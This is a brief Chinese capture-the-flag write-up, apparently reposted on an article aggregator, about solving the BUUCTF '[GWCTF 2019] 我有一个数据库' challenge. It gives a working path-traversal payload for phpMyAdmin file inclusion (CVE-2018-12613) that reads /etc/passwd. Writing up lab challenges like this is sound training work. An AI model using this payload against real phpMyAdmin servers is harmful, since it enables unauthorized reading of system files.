BUUFTC-日刷-[GWCTF 2019]我有一个数据库-phpmyadmin
2021/11/30 2:06:44
本文主要是介绍BUUFTC-日刷-[GWCTF 2019]我有一个数据库-phpmyadmin,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
啥都没有,前后端抓包也找不到啥,估计是目录扫描,但是号称第一的dirmap-master也没扫出啥
后来看博客,大佬们说看题目名字就猜到考啥,访问phpmyadmin路径(记下
phpMyAdmin是一个非常受欢迎的基于web的MySQL数据库管理工具
存在漏洞cve-2018-12613-PhpMyadmin后台文件包含
payload:target=db_datadict.php%253f/../../../../../../../../etc/passwd
看flag
这篇关于BUUFTC-日刷-[GWCTF 2019]我有一个数据库-phpmyadmin的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-07-03php客户端微信小程序根据分享携带参数进入指定页面-icode9专业技术文章分享
- 2024-07-02phpstrom链接ftp 提示上传成功 但是ftp代码没变-icode9专业技术文章分享
- 2024-06-30百度空间安装易优,如何去除URL中的index.php-icode9专业技术文章分享
- 2024-06-30宝塔Linux服务器隐藏index.php-icode9专业技术文章分享
- 2024-03-29env: php: no such file or directory
- 2024-03-01php foreach break
- 2024-02-26Exception参数 php-icode9专业技术文章分享
- 2023-12-30PHP文件批量上传-icode9专业技术文章分享
- 2023-12-30thinkphp6 withJoin-icode9专业技术文章分享
- 2023-12-27MagicArray:像php一样,让Go业务代码不再卷!